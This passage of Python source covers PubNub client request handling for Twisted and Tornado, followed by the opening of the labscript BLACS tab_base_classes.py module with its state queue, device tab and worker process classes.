if single is True:
id = time.time()
client = HTTPClient(self, url=url, urllib_func=_urllib_request,
callback=None, error=None, id=id,
timeout=timeout)
with self.latest_sub_callback_lock:
self.latest_sub_callback['id'] = id
self.latest_sub_callback['callback'] = callback
self.latest_sub_callback['error'] = error
else:
client = HTTPClient(self, url=url, urllib_func=_urllib_request,
callback=callback, error=error,
timeout=timeout)
thread = threading.Thread(target=client.run)
thread.daemon = self.daemon
thread.start()
def abort():
client.cancel()
return abort
def _request_sync(self, url, timeout=5):
global _urllib_request
## Send Request Expecting JSONP Response
response = _urllib_request(url, timeout=timeout)
try:
resp_json = json.loads(response[0])
except ValueError:
return [0, "JSON Error"]
if (response[1] != 200 and 'message' in resp_json and
'payload' in resp_json):
return {'message': resp_json['message'],
'payload': resp_json['payload']}
if response[1] == 0:
return [0, resp_json]
return resp_json
def _request(self, request, callback=None, error=None, single=False,
timeout=5, encoder_map=None):
url = self.getUrl(request, encoder_map)
if callback is None:
return get_data_for_user(self._request_sync(url,
timeout=timeout))
else:
return self._request_async(url, callback, error,
single=single, timeout=timeout)
# Pubnub Twisted
class PubnubTwisted(PubnubCoreAsync):
def start(self):
reactor.run()
def stop(self):
reactor.stop()
def timeout(self, delay, callback, *args):
def cb():
if callback is not None:
callback(*args)
timeout = reactor.callLater(delay, cb)
def cancel():
if timeout.active():
timeout.cancel()
return cancel
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None
):
super(PubnubTwisted, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid
)
self.headers = {}
self.headers['User-Agent'] = ['Python-Twisted']
self.headers['V'] = [self.version]
self.pnsdk = 'PubNub-Python-' + 'Twisted' + '/' + self.version
def _request(self, request, callback=None, error=None,
single=False, timeout=5, encoder_map=None):
global pnconn_pool
def _invoke(func, data):
if func is not None:
func(get_data_for_user(data))
## Build URL
url = self.getUrl(request, encoder_map)
agent = ContentDecoderAgent(RedirectAgent(Agent(
reactor,
contextFactory=WebClientContextFactory(),
pool=self.ssl and None or pnconn_pool
)), [('gzip', GzipDecoder)])
try:
request = agent.request(
'GET', url, Headers(self.headers), None)
except TypeError:
request = agent.request(
'GET', url.encode(), Headers(self.headers), None)
if single is True:
id = time.time()
self.id = id
def received(response):
if not isinstance(response, twisted.web._newclient.Response):
_invoke(error, {"message": "Not Found"})
return
finished = Deferred()
if response.code in [401, 403]:
response.deliverBody(PubNubPamResponse(finished))
else:
response.deliverBody(PubNubResponse(finished))
return finished
def complete(data):
if single is True:
if id != self.id:
return None
try:
data = json.loads(data)
except ValueError:
try:
data = json.loads(data.decode("utf-8"))
except ValueError:
_invoke(error, {'error': 'json decode error'})
if 'error' in data and 'status' in data and 'status' != 200:
_invoke(error, data)
else:
_invoke(callback, data)
def abort():
pass
request.addCallback(received)
request.addCallback(complete)
return abort
# PubnubTornado
class PubnubTornado(PubnubCoreAsync):
def stop(self):
ioloop.stop()
def start(self):
ioloop.start()
def timeout(self, delay, callback, *args):
handle = None
def cancel():
ioloop.remove_timeout(handle)
def cb():
if callback is not None:
callback(*args)
handle = ioloop.add_timeout(time.time() + float(delay), cb)
return cancel
def __init__(
self,
publish_key,
subscribe_key,
secret_key=False,
cipher_key=False,
auth_key=False,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None
):
super(PubnubTornado, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid
)
self.headers = {}
self.headers['User-Agent'] = 'Python-Tornado'
self.headers['Accept-Encoding'] = self.accept_encoding
self.headers['V'] = self.version
self.http = tornado.httpclient.AsyncHTTPClient(max_clients=1000)
self.id = None
self.pnsdk = 'PubNub-Python-' + 'Tornado' + '/' + self.version
def _request(self, request, callback=None, error=None,
single=False, timeout=5, connect_timeout=5, encoder_map=None):
def _invoke(func, data):
if func is not None:
func(get_data_for_user(data))
url = self.getUrl(request, encoder_map)
request = tornado.httpclient.HTTPRequest(
url, 'GET',
self.headers,
connect_timeout=connect_timeout,
request_timeout=timeout)
if single is True:
id = time.time()
self.id = id
def responseCallback(response):
if single is True:
if not id == self.id:
return None
body = response._get_body()
if body is None:
return
def handle_exc(*args):
return True
if response.error is not None:
with ExceptionStackContext(handle_exc):
if response.code in [403, 401]:
response.rethrow()
else:
_invoke(error, {"message": response.reason})
return
try:
data = json.loads(body)
except TypeError:
try:
data = json.loads(body.decode("utf-8"))
except ValueError:
_invoke(error, {'error': 'json decode error'})
if 'error' in data and 'status' in data and 'status' != 200:
_invoke(error, data)
else:
_invoke(callback, data)
self.http.fetch(
request=request,
callback=responseCallback
)
def abort():
pass
return abort
|
tab_base_classes.py | #####################################################################
# #
# /tab_base_classes.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from zprocess import Process
from Queue import Queue as Queue
import time
import sys
import threading
import cPickle
import traceback
import logging
import cgi
import os
from types import GeneratorType
import zprocess
#import labscript_utils.excepthook
if 'PySide' in sys.modules.copy():
from PySide.QtCore import *
from PySide.QtGui import *
else:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qtutils import *
class Counter(object):
"""A class with a single method that
returns a different integer each time it's called."""
def __init__(self):
self.i = 0
def get(self):
self.i += 1
return self.i
MODE_MANUAL = 1
MODE_TRANSITION_TO_BUFFERED = 2
MODE_TRANSITION_TO_MANUAL = 4
MODE_BUFFERED = 8
class StateQueue(object):
# NOTE:
#
# It is theoretically possible to remove the dependency on the Qt Mainloop (remove inmain decorators and fnuction calls)
# by introducing a local lock object instead. However, be aware that right now, the Qt inmain lock is preventing the
# statemachine loop (Tab.mainloop) from getting any states uot of the queue until after the entire tab is initialised
# and the Qt mainloop starts.
#
# This is particularly important because we exploit this behaviour to make sure that Tab._initialise_worker is placed at the
# start of the StateQueue, and so the Tab.mainloop method is guaranteed to get this initialisation method as the first state
# regardless of whether the mainloop is started before the state is inserted (the state should always be inserted as part of
# the call to Tab.create_worker, in DeviceTab.initialise_workers in DeviceTab.__init__ )
#
def __init__(self,device_name):
self.logger = logging.getLogger('BLACS.%s.state_queue'%(device_name))
self.logging_enabled = False
if self.logging_enabled:
self.logger.debug("started")
self.list_of_states = []
self._last_requested_state = None
# A queue that blocks the get(requested_state) method until an entry in the queue has a state that matches the requested_state
self.get_blocking_queue = Queue()
@property
@inmain_decorator(True)
# This is always done in main so that we avoid a race condition between the get method and
# the put method accessing this property
def last_requested_state(self):
return self._last_requested_state
@last_requested_state.setter
@inmain_decorator(True)
def last_requested_state(self, value):
self._last_requested_state = value
def log_current_states(self):
if self.logging_enabled:
self.logger.debug('Current items in the state queue: %s'%str(self.list_of_states))
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def put(self,allowed_states,queue_state_indefinitely,delete_stale_states,data,prepend=False):
if prepend:
self.list_of_states.insert(0,[allowed_states,queue_state_indefinitely,delete_stale_states,data])
else:
self.list_of_states.append([allowed_states,queue_state_indefinitely,delete_stale_states,data])
# if this state is one the get command is waiting for, notify it!
if self.last_requested_state is not None and allowed_states&self.last_requested_state:
self.get_blocking_queue.put('new item')
if self.logging_enabled:
if not isinstance(data[0],str):
self.logger.debug('New state queued up. Allowed modes: %d, queue state indefinitely: %s, delete stale states: %s, function: %s'%(allowed_states,str(queue_state_indefinitely),str(delete_stale_states),data[0].__name__))
self.log_current_states()
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def check_for_next_item(self,state):
# We reset the queue here, as we are about to traverse the tree, which contains any new items that
# are described in messages in this queue, so let's not keep those messages around anymore.
# Put another way, we want to block until a new item is added, if we don't find an item in this function
# So it's best if the queue is empty now!
if self.logging_enabled:
self.logger.debug('Re-initialsing self._get_blocking_queue')
self.get_blocking_queue = Queue()
# traverse the list
delete_index_list = []
success = False
for i,item in enumerate(self.list_of_states):
allowed_states,queue_state_indefinitely,delete_stale_states,data = item
if self.logging_enabled:
self.logger.debug('iterating over states in queue')
if allowed_states&state:
# We have found one! Remove it from the list
delete_index_list.append(i)
if self.logging_enabled:
self.logger.debug('requested state found in queue')
# If we are to delete stale states, see if the next state is the same statefunction.
# If it is, use that one, or whichever is the latest entry without encountering a different statefunction,
# and delete the rest
if delete_stale_states:
state_function = data[0]
i+=1
while i < len(self.list_of_states) and state_function == self.list_of_states[i][3][0]:
if self.logging_enabled:
self.logger.debug('requesting deletion of stale state')
allowed_states,queue_state_indefinitely,delete_stale_states,data = self.list_of_states[i]
delete_index_list.append(i)
i+=1
success = True
break
elif not queue_state_indefinitely:
if self.logging_enabled:
self.logger.debug('state should not be queued indefinitely')
delete_index_list.append(i)
# do this in reverse order so that the first delete operation doesn't mess up the indices of subsequent ones
for index in reversed(sorted(delete_index_list)):
if self.logging_enabled:
self.logger.debug('deleting state')
del self.list_of_states[index]
if not success:
data = None
return success,data
# this method should not be called in the main thread, because it will block until something is found...
# Please, only have one thread ever accessing this...I have no idea how it will behave if multiple threads are trying to get
# items from the queue...
#
# This method will block until a item found in the queue is found to be allowed during the specified 'state'.
def get(self,state):
if self.last_requested_state:
raise Exception('You have multiple threads trying to get from this queue at the same time. I won\'t allow it!')
self.last_requested_state = state
while True:
if self.logging_enabled:
self.logger.debug('requesting next item in queue with mode %d'%state)
inmain(self.log_current_states)
status,data = self.check_for_next_item(state)
if not status:
# we didn't find anything useful, so we'll wait until a useful state is added!
self.get_blocking_queue.get()
else:
self.last_requested_state = None
return data
# Make this function available globally:
get_unique_id = Counter().get
def define_state(allowed_modes,queue_state_indefinitely,delete_stale_states=False):
def wrap(function):
unescaped_name = function.__name__
escapedname = '_' + function.__name__
if allowed_modes < 1 or allowed_modes > 15:
raise RuntimeError('Function %s has been set to run in unknown states. Please make sure allowed states is one or more of MODE_MANUAL,'%unescaped_name+
'MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL and MODE_BUFFERED (or-ed together using the | symbol, eg MODE_MANUAL|MODE_BUFFERED')
def f(self,*args,**kwargs):
function.__name__ = escapedname
#setattr(self,escapedname,function)
self.event_queue.put(allowed_modes,queue_state_indefinitely,delete_stale_states,[function,[args,kwargs]])
f.__name__ = unescaped_name
f._allowed_modes = allowed_modes
return f
return wrap
class Tab(object):
def __init__(self,notebook,settings,restart=False):
# Store important parameters
self.notebook = notebook
self.settings = settings
self._device_name = self.settings["device_name"]
# Setup logging
self.logger = logging.getLogger('BLACS.%s'%(self.device_name))
self.logger.debug('Started')
# Setup the timer for updating that tab text label when the tab is not
# actively part of a notebook
self._tab_text_timer = QTimer()
self._tab_text_timer.timeout.connect(self.update_tab_text_colour)
self._tab_text_colour = 'black'
# Create instance variables
self._not_responding_error_message = ''
self._error = ''
self._state = ''
self._time_of_last_state_change = time.time()
self.not_responding_for = 0
self.hide_not_responding_error_until = 0
self._timeouts = set()
self._timeout_ids = {}
self._force_full_buffered_reprogram = True
self.event_queue = StateQueue(self.device_name)
self.workers = {}
self._supports_smart_programming = False
self._restart_receiver = []
# Load the UI
self._ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)),'tab_frame.ui'))
self._layout = self._ui.device_layout
self._device_widget = self._ui.device_controls
self._changed_widget = self._ui.changed_widget
self._changed_layout = self._ui.changed_layout
self._changed_widget.hide()
self.BLACS_connection = self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection
self._ui.device_name.setText("<b>%s</b> <br />Connection: %s"%(str(self.device_name),str(self.BLACS_connection)))
# connect signals
self._ui.smart_programming.toggled.connect(self.on_force_full_buffered_reprogram)
self._ui.smart_programming.setEnabled(False)
self.force_full_buffered_reprogram = True
self._ui.button_close.clicked.connect(self.hide_error)
self._ui.button_restart.clicked.connect(self.restart)
self._update_error()
self.supports_smart_programming(False)
# This should be done beofre the main_loop starts or else there is a race condition as to whether the
# self._mode variable is even defined!
# However it must be done after the UI is created!
self.mode = MODE_MANUAL
self.state = 'idle'
# Setup the not responding timeout
self._timeout = QTimer()
self._timeout.timeout.connect(self.check_time)
self._timeout.start(1000)
# Launch the mainloop
self._mainloop_thread = threading.Thread(target = self.mainloop)
self._mainloop_thread.daemon = True
self._mainloop_thread.start()
# Add the tab to the notebook
self.notebook.addTab(self._ui,self.device_name)
self._ui.show()
def supports_smart_programming(self,support):
self._supports_smart_programming = bool(support)
if self._supports_smart_programming:
self._ui.smart_programming.show()
else:
self._ui.smart_programming.hide()
def on_force_full_buffered_reprogram(self,toggled):
self.force_full_buffered_reprogram = toggled
@property
def force_full_buffered_reprogram(self):
return self._force_full_buffered_reprogram
@force_full_buffered_reprogram.setter
def force_full_buffered_reprogram(self,value):
self._force_full_buffered_reprogram = bool(value)
self._ui.smart_programming.setChecked(bool(value))
@property
@inmain_decorator(True)
def error_message(self):
return self._error
@error_message.setter
@inmain_decorator(True)
def error_message(self,message):
#print message
#print self._error
if message != self._error:
self._error = message
self._update_error()
@inmain_decorator(True)
def _update_error(self):
prefix = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:"MS Shell Dlg 2"; font-size:7.8pt; font-weight:400; font-style:normal;">'
suffix = '</body></html>'
#print threading.current_thread().name
self._ui.error_message.setHtml(prefix+self._not_responding_error_message+self._error+suffix)
if self._error or self._not_responding_error_message:
self._ui.notresponding.show()
self._tab_text_colour = 'red'
self.update_tab_text_colour()
else:
self._ui.notresponding.hide()
self._tab_text_colour = 'black'
self.update_tab_text_colour()
@inmain_decorator(True)
def update_tab_text_colour(self):
try:
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
if currentpage == -1:
raise Exception('')
else:
self.notebook.tabBar().setTabTextColor(currentpage,QColor(self._tab_text_colour))
self._tab_text_timer.stop()
else:
raise Exception('')
except Exception:
if not self._tab_text_timer.isActive():
self._tab_text_timer.start(100)
def get_tab_layout(self):
return self._layout
@property
def device_name(self):
return self._device_name
# sets the mode, switches between MANUAL, BUFFERED, TRANSITION_TO_BUFFERED and TRANSITION_TO_STATIC
@property
def mode(self):
return self._mode
@mode.setter
def mode(self,mode):
self._mode = mode
self._update_state_label()
@property
def state(self):
return self._state
@state.setter
def state(self,state):
self._state = state
self._time_of_last_state_change = time.time()
self._update_state_label()
@inmain_decorator(True)
def _update_state_label(self):
if self.mode == 1:
mode = 'Manual'
elif self.mode == 2:
mode = 'Transitioning to buffered'
elif self.mode == 4:
mode = 'Transitioning to manual'
elif self.mode == 8:
mode = 'Buffered'
else:
raise RuntimeError('self.mode for device %s is invalid. It must be one of MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL or MODE_BUFFERED'%(self.device_name))
self._ui.state_label.setText('<b>%s mode</b> - State: %s'%(mode,self.state))
# Todo: Update icon in tab
def create_worker(self,name,WorkerClass,workerargs={}):
if name in self.workers:
raise Exception('There is already a worker process with name: %s'%name)
if name == 'GUI':
# This is here so that we can display "(GUI)" in the status bar and have the user confident this is actually happening in the GUI,
# not in a worker process named GUI
raise Exception('You cannot call a worker process "GUI". Why would you want to? Your worker process cannot interact with the BLACS GUI directly, so you are just trying to confuse yourself!')
worker = WorkerClass()
to_worker, from_worker = worker.start(name, self.device_name, workerargs)
self.workers[name] = (worker,to_worker,from_worker)
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,[Tab._initialise_worker,[(name,),{}]],prepend=True)
def _initialise_worker(self, worker_name):
yield(self.queue_work(worker_name,'init'))
if self.error_message:
raise Exception('Device failed to initialise')
@define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True)
def _timeout_add(self,delay,execute_timeout):
QTimer.singleShot(delay,execute_timeout)
def statemachine_timeout_add(self,delay,statefunction,*args,**kwargs):
# Add the timeout to our set of registered timeouts. Timeouts
# can thus be removed by the user at ay time by calling
# self.timeouts.remove(function)
self._timeouts.add(statefunction)
# Here's a function which executes the timeout once, then queues
# itself up again after a delay:
def execute_timeout():
# queue up the state function, but only if it hasn't been
# removed from self.timeouts:
if statefunction in self._timeouts and self._timeout_ids[statefunction] == unique_id:
# Only queue up the state if we are in an allowed mode
if statefunction._allowed_modes&self.mode:
statefunction(*args, **kwargs)
# queue up another call to this function (execute_timeout)
# after the delay time:
self._timeout_add(delay,execute_timeout)
# Store a unique ID for this timeout so that we don't confuse
# other timeouts for this one when checking to see that this
# timeout hasn't been removed:
unique_id = get_unique_id()
self._timeout_ids[statefunction] = unique_id
# queue the first run:
#QTimer.singleShot(delay,execute_timeout)
execute_timeout()
# Returns True if the timeout was removed
def statemachine_timeout_remove(self,statefunction):
if statefunction in self._timeouts:
self._timeouts.remove(statefunction)
return True
return False
# returns True if at least one timeout was removed, else returns False
def statemachine_timeout_remove_all(self):
# As a consistency check, we overwrite self._timeouts to an empty set always
# This must be done after the check to see if it is empty (if self._timeouts) so do not refactor this code!
if self._timeouts:
self._timeouts = set()
return True
else:
self._timeouts = set()
return False
# def set_state(self,state):
# ready = self.tab_label_widgets['ready']
# working = self.tab_label_widgets['working']
# error = self.tab_label_widgets['error']
# self.logger.info('State changed to %s'% state)
# self.state = state
# if state == 'idle':
# working.hide()
# if self.error:
# error.show()
# else:
# ready.show()
# error.hide()
# elif state == 'fatal error':
# working.hide()
# error.show()
# ready.hide()
# else:
# ready.hide()
# working.show()
# self._time_of_last_state_change = time.time()
# self.statusbar.push(self.context_id, state)
def close_tab(self,*args):
self.logger.info('close_tab called')
self._timeout.stop()
self._tab_text_timer.stop()
for name,worker_data in self.workers.items():
worker_data[0].terminate()
# The mainloop is blocking waiting for something out of the
# from_worker queue or the event_queue. Closing the queues doesn't
# seem to raise an EOF for them, likely because it only closes
# them from our end, and an EOFError would only be raised if it
# was closed from the other end, which we can't make happen. But
# we can instruct it to quit by telling it to do so through the
# queue itself. That way we don't leave extra threads running
# (albeit doing nothing) that we don't need:
if self._mainloop_thread.is_alive():
worker_data[2].put((False,'quit',None))
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,['_quit',None],prepend=True)
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
self.notebook.removeTab(currentpage)
temp_widget = QWidget()
self.notebook.insertTab(currentpage, temp_widget, self.device_name)
self.notebook.setCurrentWidget(temp_widget)
return currentpage
def connect_restart_receiver(self,function):
if function not in self._restart_receiver:
self._restart_receiver.append(function)
def disconnect_restart_receiver(self,function):
if function in self._restart_receiver:
self._restart_receiver.remove(function)
def restart(self,*args):
# notify all connected receivers:
for f in self._restart_receiver:
try:
f(self.device_name)
except:
self.logger.exception('Could not notify a connected receiver function')
currentpage = self.close_tab()
self.logger.info('***RESTART***')
self.settings['saved_data'] = self.get_save_data()
self._restart_thread = inthread(self.wait_for_mainloop_to_stop, currentpage)
def wait_for_mainloop_to_stop(self, currentpage):
self._mainloop_thread.join()
inmain(self.clean_ui_on_restart)
inmain(self.finalise_restart, currentpage)
def clean_ui_on_restart(self):
# Clean up UI
ui = self._ui
self._ui = None
ui.setParent(None)
ui.deleteLater()
del ui
def finalise_restart(self, currentpage):
widget = self.notebook.widget(currentpage)
widget.setParent(None)
widget.deleteLater()
del widget
# Note: the following function call will break if the user hasn't
# overridden the __init__ function to take these arguments. So
# make sure you do that!
self.__init__(self.notebook, self.settings,restart=True)
# The init method is going to place this device tab at the end of the notebook specified
# Let's remove it from there, and place it the poition it used to be!
self.notebook = self._ui.parentWidget().parentWidget()
self.notebook.removeTab(self.notebook.indexOf(self._ui))
self.notebook.insertTab(currentpage,self._ui,self.device_name)
self.notebook.setCurrentWidget(self._ui)
# If BLACS is waiting on this tab for something, tell it to abort!
# self.BLACS.current_queue.put('abort')
def queue_work(self,worker_process,worker_function,*args,**kwargs):
return worker_process,worker_function,args,kwargs
def hide_error(self):
# dont show the error again until the not responding time has doubled:
self.hide_not_responding_error_until = 2*self.not_responding_for
self._ui.notresponding.hide()
self.error_message = ''
#self.tab_label_widgets['error'].hide()
#if self.state == 'idle':
# self.tab_label_widgets['ready'].show()
def check_time(self):
if self.state in ['idle','fatal error']:
self.not_responding_for = 0
if self._not_responding_error_message:
self._not_responding_error_message = ''
self._update_error()
else:
self.not_responding_for = time.time() - self._time_of_last_state_change
if self.not_responding_for > 5 + self.hide_not_responding_error_until:
self.hide_not_responding_error_for = 0
self._ui.notresponding.show()
hours, remainder = divmod(int(self.not_responding_for), 3600)
minutes, seconds = divmod(remainder, 60)
if hours:
s = '%s hours'%hours
elif minutes:
s = '%s minutes'%minutes
else:
s = '%s seconds'%seconds
self._not_responding_error_message = 'The hardware process has not responded for %s.<br /><br />'%s
self._update_error()
return True
def mainloop(self):
logger = logging.getLogger('BLACS.%s.mainloop'%(self.settings['device_name']))
logger.debug('Starting')
# Store a reference to the state queue and workers, this way if the tab is restarted, we won't ever get access to the new state queue created then
event_queue = self.event_queue
workers = self.workers
try:
while True:
# Get the next task from the event queue:
logger.debug('Waiting for next event')
func, data = event_queue.get(self.mode)
if func == '_quit':
# The user has requested a restart:
logger.debug('Received quit signal')
break
args,kwargs = data
logger.debug('Processing event %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
# Run the task with the GUI lock, catching any exceptions:
#func = getattr(self,funcname)
# run the function in the Qt main thread
generator = inmain(func,self,*args,**kwargs)
# Do any work that was queued up:(we only talk to the worker if work has been queued up through the yield command)
if type(generator) == GeneratorType:
# We need to call next recursively, queue up work and send the results back until we get a StopIteration exception
generator_running = True
break_main_loop = False
# get the data from the first yield function
worker_process,worker_function,worker_args,worker_kwargs = inmain(generator.next)
# Continue until we get a StopIteration exception, or the user requests a restart
while generator_running:
try:
logger.debug('Instructing worker %s to do job %s'%(worker_process,worker_function) )
worker_arg_list = (worker_function,worker_args,worker_kwargs)
# This line is to catch if you try to pass unpickleable objects.
try:
cPickle.dumps(worker_arg_list)
except:
self.error_message += 'Attempt to pass unserialisable object to child process:'
raise
# Send the command to the worker
to_worker = workers[worker_process][1]
from_worker = workers[worker_process][2]
to_worker.put(worker_arg_list)
self.state = '%s (%s)'%(worker_function,worker_process)
# Confirm that the worker got the message:
logger.debug('Waiting for worker to acknowledge job request')
success, message, results = from_worker.get()
if not success:
if message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
logger.info('Worker reported failure to start job')
raise Exception(message)
# Wait for and get the results of the work:
logger.debug('Worker reported job started, waiting for completion')
success,message,results = from_worker.get()
if not success and message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
if not success:
logger.info('Worker reported exception during job')
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Exception in worker - %s:<br />' % now +
'<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ',' ').replace('\n','<br />'))
else:
logger.debug('Job completed')
# Reset the hide_not_responding_error_until, since we have now heard from the child
self.hide_not_responding_error_until = 0
# Send the results back to the GUI function
logger.debug('returning worker results to function %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
next_yield = inmain(generator.send,results)
# If there is another yield command, put the data in the required variables for the next loop iteration
if next_yield:
worker_process,worker_function,worker_args,worker_kwargs = next_yield
except StopIteration:
# The generator has finished. Ignore the error, but stop the loop
logger.debug('Finalising function')
generator_running = False
# Break out of the main loop if the user requests a restart
if break_main_loop:
logger.debug('Breaking out of main loop')
break
self.state = 'idle'
except:
# Some unhandled error happened. Inform the user, and give the option to restart
message = traceback.format_exc()
logger.critical('A fatal exception happened:\n %s'%message)
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Fatal exception in main process - %s:<br /> '%now +
'<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ',' ').replace('\n','<br />'))
self.state = 'fatal error'
# do this in the main thread
inmain(self._ui.button_close.setEnabled,False)
logger.info('Exiting')
class Worker(Process):
def init(self):
# To be overridden by subclasses
pass
def run(self, worker_name, device_name, extraargs):
self.worker_name = worker_name
self.device_name = device_name
for argname in extraargs:
setattr(self,argname,extraargs[argname])
# Total fudge, should be replaced with zmq logging in future:
from labscript_utils.setup_logging import setup_logging
setup_logging('BLACS')
log_name = 'BLACS.%s_%s.worker'%(self.device_name,self.worker_name)
self.logger = logging.getLogger(log_name)
self.logger.debug('Starting')
import zprocess.locking, labscript_utils.h5_lock
zprocess.locking.set_client_process_name(log_name)
#self.init()
self.mainloop()
def mainloop(self):
while True:
# Get the next task to be done:
self.logger.debug('Waiting for next job request')
funcname, args, kwargs = self.from_parent.get()
self.logger.debug('Got job request %s' % funcname)
try:
# See if we have a method with that name:
func = getattr(self,funcname)
success = True
message = ''
except AttributeError:
success = False
message = traceback.format_exc()
self.logger.error('Couldn\'t start job:\n %s'%message)
# Report to the parent whether method lookup was successful or not:
self.to_parent.put((success,message,None))
if success:
# Try to do the requested work:
self.logger.debug('Starting job %s'%funcname)
try:
results = func(*args,**kwargs)
success = True
message = ''
self.logger.debug('Job complete')
except:
results = None
success = False
traceback_lines = traceback.format_exception(*sys.exc_info())
del traceback_lines[1]
message = ''.join(traceback_lines)
self.logger.error('Exception in job:\n%s'%message)
# Check if results object is serialisable:
try:
cPickle.dumps(results)
except:
message = traceback.format_exc()
self.logger.error('Job returned unserialisable datatypes, cannot pass them back to parent.\n' + message)
message = 'Attempt to pass unserialisable object %s to parent process:\n' % str(results) + message
success = False
results = None
# Report to the parent whether work was successful or not,
# and what the results were:
self.to_parent.put((success,message,results))
# Example code! Two classes are defined below, which are subclasses
# of the ones defined above. They show how to make a Tab class,
# and a Worker class, and get the Tab to request work to be done by
# the worker in response to GUI events.
class MyTab(Tab):
def __init__(self,notebook,settings,restart=False): # restart will be true if __init__ was called due to a restart
Tab.__init__(self,notebook,settings,restart) # Make sure to call this first in your __init__!
self.create_worker('My worker',MyWorker,{'x':7})
# foobutton = gtk.Button('foo, 10 seconds!')
# barbutton = gtk.Button('bar, 10 seconds, then error!')
# bazbutton = gtk.Button('baz, 0.5 seconds!')
# addbazbutton = gtk.Button('add 2 second timeout to baz')
# removebazbutton = gtk.Button('remove baz timeout')
# bazunpickleable= gtk.Button('try to pass baz a multiprocessing.Lock()')
# fatalbutton = gtk.Button('fatal error, forgot to add @define_state to callback!')
# self.checkbutton=gtk.CheckButton('have baz\nreturn a Queue')
# self.toplevel = gtk.VBox()
# self.toplevel.pack_start(foobutton)
# self.toplevel.pack_start(barbutton)
# hbox = gtk.HBox()
# self.toplevel.pack_start(hbox)
# hbox.pack_start(bazbutton)
# hbox.pack_start(addbazbutton)
# hbox.pack_start(removebazbutton)
# hbox.pack_start(bazunpickleable)
# hbox.pack_start(self.checkbutton)
# self.toplevel.pack_start(fatalbutton)
# foobutton.connect('clicked', self.foo)
# barbutton.connect('clicked', self.bar)
# bazbutton.connect('clicked', self.baz)
# fatalbutton.connect('clicked',self.fatal )
# addbazbutton.connect('clicked',self.add_baz_timeout)
# removebazbutton.connect('clicked',self.remove_baz_timeout)
# bazunpickleable.connect('clicked', self.baz_unpickleable)
# # These two lines are required to top level widget (buttonbox
# # in this case) to the existing GUI:
# self.viewport.add(self.toplevel)
# self.toplevel.show_all()
self.initUI()
def initUI(self):
self.layout = self.get_tab_layout()
foobutton = QPushButton('foo, 10 seconds!')
barbutton = QPushButton('bar, 10 seconds, then error!')
bazbutton = QPushButton('baz, 0.5 seconds!')
addbazbutton = QPushButton('add 2 second timeout to baz')
removebazbutton = QPushButton('remove baz timeout')
bazunpickleable= QPushButton('try to pass baz a threading.Lock()')
fatalbutton = QPushButton('fatal error, forgot to add @define_state to callback!')
self.checkbutton = QPushButton('have baz\nreturn a Queue')
self.checkbutton.setCheckable(True)
#self.device_widget.addWidget(layout)
self.layout.addWidget(foobutton)
self.layout.addWidget(barbutton)
self.layout.addWidget(bazbutton)
self.layout.addWidget(addbazbutton)
self.layout.addWidget(removebazbutton)
self.layout.addWidget(bazunpickleable)
self.layout.addWidget(fatalbutton)
self.layout.addWidget(self.checkbutton)
foobutton.clicked.connect(self.foo)
barbutton.clicked.connect(self.bar)
bazbutton.clicked.connect(self.baz)
fatalbutton.clicked.connect(self.fatal )
addbazbutton.clicked.connect(self.add_baz_timeout)
removebazbutton.clicked.connect(self.remove_baz_timeout)
bazunpickleable.clicked.connect(self.baz_unpickleable)
# It is critical that you decorate your callbacks with @define_state
# as below. This makes the function get queued up and executed
# in turn by our state machine instead of immediately by the
# GTK mainloop. Only don't decorate if you're certain that your
# callback can safely happen no matter what state the system is
# in (for example, adjusting the axis range of a plot, or other
# appearance settings). You should never be calling queue_work
# or do_after from un undecorated callback.
@define_state(MODE_MANUAL,True)
def foo(self):
self.logger.debug('entered foo')
#self.toplevel.set_sensitive(False)
# Here's how you instruct the worker process to do
# something. When this callback returns, the worker will be
